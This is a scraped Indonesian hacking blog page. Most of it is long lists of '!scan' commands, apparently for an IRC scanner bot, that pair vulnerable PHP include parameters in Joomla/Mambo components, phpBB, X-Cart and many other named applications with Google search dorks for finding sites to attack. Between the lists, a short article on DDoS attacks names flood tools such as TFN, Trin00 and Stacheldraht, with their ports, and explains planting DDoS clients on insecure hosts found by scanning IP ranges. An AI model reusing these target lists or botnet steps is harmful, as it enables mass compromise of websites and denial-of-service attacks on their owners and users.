!scan index.php?x= inurl:”com/index.php?x=*.php”
!scan index.php?mode= inurl:”com/index.php?mode=*.php”
!scan index.php?stranica= inurl:”index.php?stranica=”
!scan index.php?sub= inurl:”il/index.php?sub=*.php”
!scan index.php?id= inurl:”/index.php?id=*.php”
!scan index.php?t= inurl:”/index.php?t=*.php”
!scan index.php?r= inurl:”index.php?r=*.php”
!scan index.php?menu= inurl:”net/index.php?menu=*.php”
!scan index.php?pag= inurl:”com/index.php?pag=*.php”
!scan solpot.html?body= allinurl: “solpot.html?body”
!scan port.php?content= inurl:port.php?content=*.php”
!scan index0.php?show= inurl:index0.php?show=*.php”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php site:br
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
!scan content.php?page= inurl:”*content.php?page=*.php”
!scan index.php?topic= inurl:”/index.php?topic=*.php”
!scan index.php?u= inurl:”/index.php?u=*.php”
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”com_linkdirectory”
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”.tr./components”
!scan modules/My_eGallery/index.php?basepath= inurl:”My_eGallery”
!scan /modules/vwar/admin/admin.php?vwar_root= inurl:”vwar”
!scan index.php?loc= allinurl:.br/index.php?loc=
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_comprofiler”
!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”com_cropimage”
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
!scan myevent.php?myevent_path= inurl:myevent.php
!scan /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:”com_uhp”
!scan myevent.php?myevent_path= inurl:”uk/myevent.php
!scan includes/functions.php?phpbb_root_path= powered by Integramod
!scan m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:”uk/tags.php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_remository
!scan show.php?path= inurl:fclick
!scan show.php?path= inurl:.ac.uk/fclick
!scan administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”.de.*/com_linkdirectory”
!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:”com_a6mambocredits”
scan modifyform.html?code= modifyform
!scan Encoder.php?base_dir= phpsyncml
!scan Decoder.php?base_dir= phpsyncml
!scan administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= “com_joom12pic”
!scan phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT= “phpFFL”
!scan phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT= “phpFFL”
!scan afb-3-beta-2007-08-28/_includes/settings.inc.php?approot= “Ajax File Browser”
!scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= inurl:”com_joomlaradiov5″
!scan config.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan prepare.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan smarty.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan customer/product.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan provider/auth.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan admin/auth.php?xcart_dir= “X-CART. Powerful PHP shopping cart software”
!scan NuclearBB/tasks/send_queued_emails.php?root_path= NuclearBB
!scan protection.php?action=logout&siteurl= “Site Layout & Graphics”
!scan protection.php?action=logout&siteurl= statcounter
!scan protection.php?action=logout&siteurl= “PHPFanBase”
!scan manager/admin/index.php?MGR= “phpRealty”
!scan manager/admin/p_ins.php?MGR= “phpRealty”
!scan manager/admin/u_ins.php?MGR= “phpRealty”
!scan source/mod/rss/viewitem.php?Codebase= ED Engine
!scan source/mod/rss/view.php?Codebase= ED Engine
!scan source/mod/rss/post.php?Codebase= ED Engine
!scan source/mod/rss/channeledit.php?Codebase= WebEd
!scan joomla/index.php?option=com_restaurante&task= “/index.php?option=com_restaurante”
!scan modules/addons/plugin.php?doc_root= “txx cms”
!scan modules/addons/plugin.php?doc_root= inurl:addons
!scan modules/Discipline/CategoryBreakdownTime.php?FocusPath= inurl:Discipline
!scan modules/Discipline/CategoryBreakdownTime.php?staticpath= inurl:Discipline
!scan modules/Discipline/StudentFieldBreakdown.php?staticpath= inurl:Discipline
!scan lib/functions.php?DOC_ROOT= “Online Fantasy Football League”
!scan lib/header.php?DOC_ROOT= “Online Fantasy Football League”
!scan menu.php?functions_file= phpMytourney
!scan environment.php?DIR_PREFIX= AnyInventory
!scan dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH= Phpof
!scan stphpapplication.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan senetman/html/index.php?page= eNetman
!scan es_desp.php?files_dir= Weblogicnet
!scan es_custom_menu.php?files_dir= Weblogicnet
!scan es_offer.php?files_dir= Weblogicnet
!scan stphpbtnimage.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpform.php?STPHPLIB_DIR= SpeedTech PHP Library
!scan stphpapplication.php?STPHPLIB_DIR= “stph”
!scan stphpbtnimage.php?STPHPLIB_DIR= “stph”
!scan stphpform.php?STPHPLIB_DIR= “stph”
!scan senetman/html/index.php?page= “senetman”
!scan /intern/admin/other/backup.php?admin=1&rootdir= “phpBG”

SERANGAN DDOS

2009-10-14T06:18:00.000+07:00

ABSTRAK

Pesatnya penyebaran internet sekarang ini, membuat banyak pelaku bisnis menggunakan jasa internet sebagai media untuk menjalankan bisnisnya. Ada juga pelaku bisnis yang hanya menggunakan jasa internet saja sebagai tempat transaksi dalam menjalankan bisnisnya. Pelaku bisnis seperti ini mungkin saja mereka tidak memiliki kantor yang tetap sebagai pusat bisnis, dimana mereka hanya mengandalkan internet sebagai pusat bisnisnya. Bagi pengusaha yang sebagian besar memanfaatkan internet sebagai pusat bisnisnya harus berhati-hati atas adanya bahaya para cracker. Salah satu serangan yang sederhana tetapi sangat berbahaya adalah serangan DDOS. Serangan DDOS ini sangat memberikan efek negative kepada para pengusaha yang menggunakan jasa layanan internet.

Kata kunci: serangan, DDOS.

PENDAHULUAN

Internet merupakan sebuah media informasi maupun komunikasi. Banyak informasi yang bisa didapatkan diinternet. Mulai dari informasi mengenai pendidikan, iklan maupun yang lainnya. Selain itu, internet juga banyak dimanfaatkan oleh para pengusaha untuk dijadikan sebagai peluang bisnis. Meskipun tidak memiliki kantor yang tetap, bisnis masih bisa dilakukan meskipun hanya menggunakan sebuah web sederhana.

Para pelaku bisnis yang hanya mengandalkan fasilitas internet harus berhati-hati atas ancaman-ancaman yang ada diinternet. Misalnya serangan DDOS yang merugikan. Serangan ini bisa membuat server web yang digunakan sulit untuk diakses, bahkan sampai tidak bisa diakses. Hal ini bisa menimbulkan kerugian di pihak pengusaha yang hanya menggunakan layanan internet untuk menjalankan bisnisnya.

PENGERTIAN DENIAL DISTRIBUTE OF SERVICE (DDOS)

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut [01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses [02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04].

Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut.

CARA KERJA SERANGAN DDOS

Cara kerja DDOS dalam melakukan serangan kepada situs yang diinginkan. Secara sederhana serangan DDOS bisa dilakukan dengan menggunakan perintah “ping” yang dimiliki oleh windows. Proses “ping” ini ditujukan kepada situs yang akan menjadi korban. Jika perintah ini hanya dilakukan oleh sebuah komputer, perintah ini mungkin tidak menimbulkan efek bagi komputer korban. Akan tetapi, jika perintah ini dilakukan oleh banyak komputer kepada satu situs maka perintah ini bisa memperlambat kerja komputer korban.

Satu komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi. Dan server dari situs yang dituju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang. Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan “Ping” ke situs yang di tuju [05].

BEBERAPA SOFTWARE YANG DIGUNAKAN UNTUK MELANCARKAN SERANGAN DDOS

Disini akan di bahas empat macam software yang bisa digunakan untuk melancarkan serangan DDOS [06].

1. The Tribal Flood Network (TFN).

TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground
yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood
connection dengan menggunakan protocol yang ada pada TCP/IP yaitu:

o UDP, difokuskan pada domain name system dan network management program.

o TCP, pusat e-mail dan web transaksi.

o ICMP, digunakan oleh para professional untuk troubleshooting network.

o Nama program masternya adalah : tribe.c dan program daemon bernama td.c

2. Trin00

Software ini menggunakan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah:

o Attack to Master : TCP Port 27665

o Master to Daemon : UDP Port 27444

o Daemon to Master(s) : UDP Port 31335

Program master : master.c dan program Daemon : ns.c

Program ini tidak bagus untuk digunakan karena master dan daemon
berhubungan dengan clear text.

3. Stacheldraht
Nama program ini dalam bahasa Jerman yang berarti “Barb Wire”. Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis. Maka dari itu program ini paling effisien dan cukup berbahaya.

o Port TCP : 16660 dan 60001

o Master program bernama : mserv.c dan daemon program bernama : td.c

o Program ini memiliki client yang juga sebagai telnet : client.c

Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.

4. TFN2K
Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.

CARA MENGINSTALASI PROGRAM DDOS

Untuk menginstalasi program DDOS, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security dengan cara yang sangat mudah, gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Software client tersebut dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan[06].

EFEK DARI SERANGAN DDOS

Efek dari serangan DDOS sangat menganggu pengguna internet yang ingin mengunjungi situs yang telah diserang menggunakan DDOS. Situs yang terserang DDOS sulik untuk diakses bahkan mungkin tidak bisa untuk diakses. Kesulitan pengaksesan sebuah situs diinternet bisa saja merugikan bagi sebagian orang yang bisnisnya sangat tergantung kepada layanan internet.

Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti ini hanya merupakan gangguan yang memerlukan restart system.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker
untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini
merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai
tujuannya yang telah ditargetkan[06].

Dari pernyataan di atas dapat disimpulkan bahwa serangan DDOS tidak semata-mata hanya untuk membuat web server kelebihan beban akan tetapi merupakan sebuah taktik untuk mencapai tujuan tertentu. Tujuan itu bisa saja persaingan bisnis supaya layanan dari situs saingan terhambat.

DAFTAR PUSTAKA

[01] MOBY (echo-staff), “ SERANGAN DENIAL OF SERVICE”, http://ezine.echo.or.id/ezine2/ddos~Moby.txt, tanggal akses 14 Desember 2007.

[02] Titis Widyatmoko, 2004, “Situs Taruhan Kena Serangan DDos”, http://www.detikinet.com/index.php/detik.read/tahun/2004/bulan/03/tgl/28/time/123200/idnews/116214/idkanal/110, tanggal akses 14 Desember 2007.

[03] “Distributed Denial of Service (DDOS) Attacks”,http://mas.aries.web.id/index.php?option=com_content&task=view&id=30&Itemid=1, tanggal akses 14 Desember 2007.

[04] S’to, 2002, “DDoS, Serangan yang Belum Tertangkal”, http://www.jasakom.com/plugins/p2_news/printarticle.php?p2_articleid=415, tanggal akses 14 Desember 2007.

[05] “Server Web Undiknas Sempat Terkena DDOS Attack”, http://www.undiknas.ac.id/server-web-undiknas-sempat-terkena-ddos-attack.html, tanggal akses 14 Desember 2007.

[06] 2005, ”DDOS”, http://yanuar.kutakutik.or.id/around-the-world/ddos/, tanggal akses 14 Desember 2007.

sumber : http://ym-tutorial.blogspot.com/2008/05/serangan-ddos.html

DORK Part 1

2009-10-14T06:15:00.003+07:00

DORK Part 1

!scan index.php?template= inurl:”index.php?”
!scan search.php?cutepath= inurl:”search.php?”
!scan show_news.php?cutepath= inurl:”show_news.php?”
!scan page.php?doc= allinurl:”page.php?doc=”
!scan administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:”com_webring”
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:”.de.*/com_mgm”
!scan help.php?css_path= inurl:phplive site:.ru
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”com_galleria/”
!scan big.php?pathtotemplate= inurl:”.de.*”big.php?”
!scan includes/search.php?GlobalSettings[templatesDirectory]= inurl:”.com”search.php?”
!scan interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= “Papoo CMS”
!scan /functions.php?include_path= “powered by: phpecard”
!scan modules/My_eGallery/index.php?basepath= inurl:”.de.*”My_eGallery”
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”.net.*”com_galleria/”
!scan /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “powered by CubeCart 3.0.6″
!scan /class.mysql.php?path_to_bt_dir= “powered by paBugs 2.0 Beta 3″
!scan /include/footer.inc.php?_AMLconfig[cfg_serverpath]= “powered by AllMyLinks”
!scan /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
!scan index2.php?to= inurl:”/index2.php?to=*.php”
!scan index.php?load= inurl:”/index.php?load=*.php”
!scan home.php?pagina= inurl:”home.php?pagina=”
!scan /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
!scan /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
!scan /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
!scan /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
!scan /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
!scan /include/write.php?dir= allinurl:/zboard/zboard.php
!scan db.php?path_local= inurl:”db.php?path_local=”
!scan index.php?site= inurl:”index.php?site=”
!scan index.php?url= inurl:”index.php?url=”
!scan index.php?p= inurl:”index.php?p=”
!scan index.php?openfile= inurl:”index.php?openfile=”
!scan index.php?file= inurl:”index.php?file=”
!scan index.php?go= inurl:”index.php?go=”
!scan index.php?content= inurl:”index.php?content=”
!scan index.php?side= inurl:”index.php?side=”
!scan index.php?kobr= inurl:”index.php?kobr=”index.php?pg= inurl:”index.php?pg=”
!scan index.php?doc= inurl:”index.php?doc=”
!scan index.php?l= inurl:”index.php?l=”
!scan index.php?a= inurl:”index.php?a=”
!scan index.php?principal= inurl:”index.php?principal=”
!scan index.php?show= inurl:”index.php?show=”
!scan index.php?opcao= inurl:”index.php?opcao=”
!scan index.php?conteudo= inurl:”index.php?conteudo=”
!scan index.php?meio= inurl:”index.php?meio=”
!scan index.php?inc= inurl:”index.php?inc=”
!scan index.php?c= inurl:”index.php?c=”
!scan index.php?rage= inurl:”index.php?rage=”
!scan index.php?arquivo= inurl:”index.php?arquivo=”
!scan index.php?nic= inurl:”index.php?nic=”
!scan index.php?x= inurl:”index.php?x=”
!scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:”com_mtree”
!scan index.php?place= inurl:”index.php?place=”
!scan index.php?show= inurl:”index.php?show=”
!scan index.php?dsp= inurl:”index.php?dsp=”
!scan index.php?dept= inurl:”index.php?dept=”
!scan index.php?lg= inurl:”index.php?lg=”
!scan index.php?inhalt= inurl:”index.php?inhalt=”
!scan index.php?ort= inurl:”index.php?ort=”
!scan index.php?pilih= inurl:”index.php?pilih=”
!scan principal.php?conteudo= inurl:”principal.php?conteudo=”
!scan main.php?site= inurl:”main.php?site=”
!scan template.php?pagina= inurl:”template.php?pagina=”
!scan contenido.php?sec= inurl:”contenido.php?sec=”
!scan index_principal.php?pagina= inurl:”index_principal.php?pagina=”
!scan template.php?name= inurl:”template.php?name=”
!scan forum.php?act= inurl:”forum.php?act=”
!scan home.php?action= inurl:”home.php?action=”
!scan home.php?pagina= inurl:”home.php?pagina=”
!scan noticias.php?arq= inurl:”noticias.php?arq=”
!scan main.php?x= inurl:”main.php?x=”
!scan main.php?page= inurl:”main.php?page=”
!scan default.php?page= inurl:”default.php?page=”
!scan index.php?cont= inurl:”index.php?cont=”
!scan index.php?configFile= inurl:”index.php?configFile=”
!scan index.php?meio.php= inurl:”index.php?meio.php=”
!scan index.php?include= inurl:”index.php?include=”
!scan index.php?open= inurl:”index.php?open=
!scan index.php?visualizar= inurl:”index.php?visualizar=”
!scan index.php?x= inurl:”index.php?x=”
!scan index.php?pag= inurl:”index.php?pag=”
!scan index.php?cat= inurl:”index.php?cat=”
!scan index.php?action= inurl:”index.php?action=”
!scan index.php?do= inurl:”index.php?do=”
!scan index2.php?x= inurl:”index2.php?x=”
!scan index2.php?content= inurl:”index2.php?content=”
!scan main.php?pagina= inurl:”main.php?pagina=”
!scan index.phpmain.php?x= inurl:”index.phpmain.php?x=”
!scan index.php?link= inurl:”index.php?link=”
!scan index.php?canal= inurl:”index.php?canal=”
!scan index.php?screen= inurl:”index.php?screen=”
!scan index.php?langc= inurl:”index.php?langc=”
!scan services.php?page= inurl:”services.php?page=”
!scan htmltonuke.php?filnavn= inurl:”htmltonuke.php?filnavn=”
!scan ihm.php?p= inurl:”ihm.php?p=”
!scan default.php?page= inurl:”default.php?page=”
!scan folder.php?id= inurl:”folder.php?id=”
!scan index.php?Load= inurl:”index.php?Load=”
!scan index.php?Language= inurl:”index.php?Language=”
!scan hall.php?file= inurl:”hall.php?file=”
!scan hall.php?page= inurl:”hall.php?page=”
!scan template.php?goto= inurl:”template.php?goto=”
!scan video.php?content= inurl:”video.php?content=”
!scan pages.php?page= inurl:”pages.php?page=”
!scan print.php?page= inurl:”print.php?page=”
!scan show.php?page= inurl:”show.php?page=”
!scan view.php?page= inurl:”view.php?page=”
!scan media.php?page= inurl:”media.php?page=”
!scan index1.php?choix= inurl:”index1.php?choix=”
!scan index1.php?menu= inurl:”index1.php?menu”
!scan index.php?ort= inurl:”index.php?ort=”
!scan index2.php?showpage= inurl:”index2.php?showpage=”
!scan index2.php?ascii_seite= inurl:”index2.php?ascii_seite=”
!scan index2.php?DoAction= inurl:”index2.php?DoAction=”
!scan index2.php?ID= inurl:”index2.php?ID=”
!scan index2.php?url_page= inurl:”index2.php?url_page=”
!scan index1.php?dat= inurl:”index1.php?dat=”
!scan index1.php?site= inurl:”index1.php?site=”
!scan index0.php?show= inurl:”index0.php?show=”
!scan home.php?content= inurl:”home.php?content=”
!scan port.php?content= inurl:”port.php?content=”
!scan main.php?link= inurl:”main.php?link=”
!scan home.php?x= inurl:”home.php?x=”
!scan index1.php?x= inurl:”index1.php?x=”
!scan index2.php?x= inurl:”index2.php?x=”
!scan main.php?x= inurl:”main.php?x=”
!scan homepage.php?sel= inurl:”homepage.php?sel=”
!scan /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
!scan /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
!scan /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan /squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
!scan /bz/squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
!scan /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
!scan /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
!scan /classes.php?LOCAL_PATH= “powered by siteframe”
!scan al_initialize.php?alpath= “Powered by AutoLinks Pro”
!scan /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
!scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” inurl:*gov*
!scan /extensions/moblog/moblog_lib.php?basedir= “powered by pivot”
!scan /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= “phpCodeGenie v. 3.0.2″
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
!scan modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:”AllMyGuests”
!scan /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:”com_rsgallery”
!scan /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:”com_smf”
!scan /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
!scan administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:”com_peoplebook”
!scan /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1″
!scan inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= “Script r?alis? par BinGo PHP”
!scan /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:”/com_mtree/”
!scan /jscript.php?my_ms[root]= intitle:”myspeach” inurl:”chat_exemple.php”
!scan /popup_window.php?site_isp_root= inurl:”Squirrelcart”
!scan /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
!scan /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:uk
!scan /includes/functions_portal.php?phpbb_root_path= “powered by Integramod”
!scan historytemplate.php?cms[support]=1&cms[tngpath]= “powered by The Next Generation of Genealogy Sitebuilding”
!scan /components/com_simpleboard/image_upload.php?sbp= inurl:”com_simpleboard”
!scan /surveys/survey.inc.php?path= inurl:surveys
!scan index.php?body= inurl:”index.php?body=”
!scan /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
!scan enc/content.php?Home_Path= “powered by doodle cart”
!scan /classified_right.php?language_dir= inurl:classified.php phpbazar
!scan /sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
!scan /embed/day.php?path= intitle:”Login to Calendar”
!scan /includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2″
!scan /includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
!scan /mcf.php?content= allinurl:”mcf.php” site:.de
!scan /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.ar
!scan skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
!scan /zipndownload.php?PP_PATH= “Powered by: PhotoPost”
!scan /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
!scan /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
!scan /main.php?sayfa= inurl:”main.php?sayfa=”
!scan /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
!scan /addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
!scan /header.php?abspath= “MobilePublisherPHP”
!scan components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
!scan impex/ImpExData.php?systempath= intext:powered by vbulletin
!scan /modules/vwar/admin/admin.php?vwar_root= allinurl:vwar site:.com
!scan /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN 1.2.3″
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
!scan /tools/send_reminders.php?includedir= allinurl:day.php?date=
!scan /skin/zero_vote/error.php?dir= skin/zero_vote/error.php
!scan /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
!scan /login.php?dir= allinurl:login.php?dir=
!scan /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
!scan index.php?pageurl= inurl:”index.php?pageurl=*.php”
!scan /templates/headline_temp.php?nst_inc= allintitle:fusion:news:management:system
!scan index.php?var= inurl:”index.php?var=*.php”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?go= inurl:”index.php?go=”
!scan index.php?site= inurl:”index.php?site=”
!scan phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
!scan administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
!scan index.php?pagina= inurl:”index.php?pagina=*.php”
!scan index.php?id= inurl:”index.php?id=*.php”
!scan index1.php?= inurl:”index1.php?=*.php?
!scan index.php?site= inurl:”index.php?site=*.php”
!scan main.php?id= inurl:”main.php?id=*.php”
!scan content.php?page= inurl:”content.php?page=*.php”
!scan admin.php?page= inurl:”admin.php?page=*.php”
!scan lib/gore.php?libpath= inurl:”/SQuery/”
!scan SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
!scan index2.php?p= inurl:”index2.php?p=*.php”
!scan index1.php?go= inurl:”index1.php?go=*.php”
!scan news_detail.php?file= inurl:”news_detail.php?file=*.php”
!scan old_reports.php?file= inurl:”old_reports.php?file=*.php”
!scan index.php?x= inurl:”index.php?x=*.php”
!scan index.php?nic= inurl:”index.php?nic=*.php”
!scan homepage.php?sel= inurl:”homepage.php?sel=*.php”
!scan index.php?sel= inurl:”index.php?sel=*.php”
!scan main.php?x= inurl:”main.php?x=*.php”
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
!scan index2.php?x= inurl:index2.php?x=*.php”
!scan main.php?pagina= inurl:”main.php?pagina=*.php”
!scan test.php?page= allinurl:test.php?page=
!scan components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “inurl:com_phpshop”
!scan akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
!scan index.php?page= inurl:”edu/index.php?page=*.php”
!scan *.php?page= inurl:*.php?page=*.php”
!scan index.php?oldal= inurl:”index.php?oldal=*.php”
!scan index.php?lang=gr&file inurl:”index.php?lang=gr&file=*.php”
!scan index.php?pag= inurl:”index.php?pag=*.php”
!scan index.php?incl= inurl:”index.php?incl=”
!scan avatar.php?page= inurl:”avatar.php?page=”
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is A Free
!scan index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is”
!scan ndex.php?p= inurl:”edu/index.php?p=*.php”
!scan /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
!scan index.php?x= inurl:”com/index.php?x=*.php”
!scan index.php?mode= inurl:”com/index.php?mode=*.php”
!scan index.php?stranica= inurl:”index.php?stranica=”
